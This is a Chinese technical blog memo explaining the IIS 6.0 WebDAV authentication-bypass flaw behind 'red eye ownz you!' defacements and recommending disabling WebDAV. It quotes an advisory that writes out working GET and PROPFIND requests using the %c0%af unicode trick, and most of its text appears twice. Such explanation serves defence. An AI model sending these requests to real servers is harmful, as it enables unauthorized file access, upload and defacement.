上一篇: 应用程序-特定权限设置未将com服务器应用程序(CLSID为{BA126AD-2166-11D1-0
下一篇: Can't create/write to file 'C:\WINDOWS\TEMP\...MYS
技术备忘 
IIS6 WebDAV 漏洞防范 red eye ownz you!
作者:王勋 日期:2011-04-16
最近,发现不少网站的首页都被修改成"red eye ownz you!”的字样,这是因为最近被公开的一个有关微软IIS6.0的一个漏洞。
这是在服务器的IIS日志找到的一条入侵记录:"2009-07-01 19:51:57 W3SVC1431075365 191.13.61.1 PUT /welcome.html - 80 - 63.246.146.130 Microsoft+Data+Access+Internet+Publishing+Provider+DAV+1.1 201 0 64"
记录清晰的显示黑客利用最近爆出的“IIS6 WebDAV 漏洞”对网站进行攻击,援引一段原文:
“美国计算机紧急反应组近日透露,上周发现的 IIS6 WebDAV 漏洞已经被用在攻击中,这个由计算机安全专家 Nikolaos Rangos 发现的漏洞可以通过一个伪造的 HTTP 请求,查看并上传文件到 IIS6 服务器,攻击利用了微软处理 Unicode token 过程中的漏洞。
微软在一份声明中表示,尚未听说此类攻击的发生,但他们正在对此进行观察,并将提供安全顾问为用户提供帮助。漏洞只影响那些在 IIS6 中启用了 WebDAV 协议的系统,WebDAV 用来在 Web 上共享文档。
攻击者可以无需授权,查看那服务器的文件,并上传文件到服务器,独立安全专家 Thierry Zoller 确认了 Rangos 的发现,不过 Zoller 表示他还没有发现可以在被攻击服务器上运行任何恶意程序的方法。Zoller 同时表示,IIS5 和 IIS7 目前不受影响,但微软其它使用 WebDAV 技术的产品可能也面临危险。他建议用户在收到微软补丁之前先禁用 WebDAV 协议。 ”
通过一番搜索,找到了有关该漏洞的一些线索,下面这段是有关这个漏洞的原文:
Microsoft IIS 6.0 WebDAV Remote Authentication Bypass
Affected Vendors
Microsoft
Affected Products
Web Server
Vulnerability Details
This vulnerability allows remote attackers to bypass access restrictions on vulnerable installations
of Internet Information Server 6.0.
The specific flaw exists within the WebDAV functionality of IIS 6.0. The Web Server fails to properly
handle unicode tokens when parsing the URI and sending back data. Exploitation of this issue can
result in the following:
– Authentication bypass of password protected folders
– Listing, downloading and uploading of files into a password protected WebDAV folder
Authentication bypass of password protected folders
Assume there is a password protected folder in „d:\inetpub\wwwroot\protected\“. The password
protection mechanism is not relevant for the attack to work. Inside this folder there is a file named
„protected.zip“
The attacker sends a HTTP GET request to the web server.
GET /..%c0%af/protected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername
As seen above the URI contains the unicode character '/' (%c0%af). This unicode character is
removed in a WebDAV request. „Translate: f“ instructs the web server to handle the request using
WebDAV. Using this malicious URI construct the webserver sends the file located at
„/protected/protected.zip“ back to the attacker without asking for proper authentication.
Another valid request an attacker might send to the web server is:
GET /prot%c0%afected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername
IIS 6.0 will remove the „%c0%af“ unicode character internally from the request and send back the
password protected file without asking for proper credentials.
ASP scripts cannot be downloaded in this way unless serving of script source-code is enabled.
Listing files in a password protected WebDAV folder
The attack on WebDAV folders is similar. The attacker can bypass the access restrictions of the
password protected folder and list, download, upload and modify files.
The attacker sends a PROPFIND request to the web server.
PROPFIND /protec%c0%afted/ HTTP/1.1
Host: servername
User-Agent: neo/0.12.2
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml
http://apache.org/dav/props/"/>
IIS responds with the directory listing of the folder without asking for a password.
如何才能有效的防范该漏洞?
1、可以在 IIS6 中禁用 WebDAV。
2、只需在 Windows 2003 的安装和卸载 Windows 组件中,找到应用程序服务器部分,并进入 IIS 组件选项,去掉 WebDAV 前面的勾选,然后重新启动 IIS 即可。
这是在服务器的IIS日志找到的一条入侵记录:"2009-07-01 19:51:57 W3SVC1431075365 191.13.61.1 PUT /welcome.html - 80 - 63.246.146.130 Microsoft+Data+Access+Internet+Publishing+Provider+DAV+1.1 201 0 64"
记录清晰的显示黑客利用最近爆出的“IIS6 WebDAV 漏洞”对网站进行攻击,援引一段原文:
“美国计算机紧急反应组近日透露,上周发现的 IIS6 WebDAV 漏洞已经被用在攻击中,这个由计算机安全专家 Nikolaos Rangos 发现的漏洞可以通过一个伪造的 HTTP 请求,查看并上传文件到 IIS6 服务器,攻击利用了微软处理 Unicode token 过程中的漏洞。
微软在一份声明中表示,尚未听说此类攻击的发生,但他们正在对此进行观察,并将提供安全顾问为用户提供帮助。漏洞只影响那些在 IIS6 中启用了 WebDAV 协议的系统,WebDAV 用来在 Web 上共享文档。
攻击者可以无需授权,查看那服务器的文件,并上传文件到服务器,独立安全专家 Thierry Zoller 确认了 Rangos 的发现,不过 Zoller 表示他还没有发现可以在被攻击服务器上运行任何恶意程序的方法。Zoller 同时表示,IIS5 和 IIS7 目前不受影响,但微软其它使用 WebDAV 技术的产品可能也面临危险。他建议用户在收到微软补丁之前先禁用 WebDAV 协议。 ”
通过一番搜索,找到了有关该漏洞的一些线索,下面这段是有关这个漏洞的原文:
Microsoft IIS 6.0 WebDAV Remote Authentication Bypass
Affected Vendors
Microsoft
Affected Products
Web Server
Vulnerability Details
This vulnerability allows remote attackers to bypass access restrictions on vulnerable installations
of Internet Information Server 6.0.
The specific flaw exists within the WebDAV functionality of IIS 6.0. The Web Server fails to properly
handle unicode tokens when parsing the URI and sending back data. Exploitation of this issue can
result in the following:
– Authentication bypass of password protected folders
– Listing, downloading and uploading of files into a password protected WebDAV folder
Authentication bypass of password protected folders
Assume there is a password protected folder in „d:\inetpub\wwwroot\protected\“. The password
protection mechanism is not relevant for the attack to work. Inside this folder there is a file named
„protected.zip“
The attacker sends a HTTP GET request to the web server.
GET /..%c0%af/protected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername
As seen above the URI contains the unicode character '/' (%c0%af). This unicode character is
removed in a WebDAV request. „Translate: f“ instructs the web server to handle the request using
WebDAV. Using this malicious URI construct the webserver sends the file located at
„/protected/protected.zip“ back to the attacker without asking for proper authentication.
Another valid request an attacker might send to the web server is:
GET /prot%c0%afected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername
IIS 6.0 will remove the „%c0%af“ unicode character internally from the request and send back the
password protected file without asking for proper credentials.
ASP scripts cannot be downloaded in this way unless serving of script source-code is enabled.
Listing files in a password protected WebDAV folder
The attack on WebDAV folders is similar. The attacker can bypass the access restrictions of the
password protected folder and list, download, upload and modify files.
The attacker sends a PROPFIND request to the web server.
PROPFIND /protec%c0%afted/ HTTP/1.1
Host: servername
User-Agent: neo/0.12.2
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml
IIS responds with the directory listing of the folder without asking for a password.
如何才能有效的防范该漏洞?
1、可以在 IIS6 中禁用 WebDAV。
2、只需在 Windows 2003 的安装和卸载 Windows 组件中,找到应用程序服务器部分,并进入 IIS 组件选项,去掉 WebDAV 前面的勾选,然后重新启动 IIS 即可。
文章来自: 
引用通告: 
Tags: 
相关日志:
评论: 0 | 引用: 0 | 查看次数: 2068
发表评论
你没有权限发表评论!
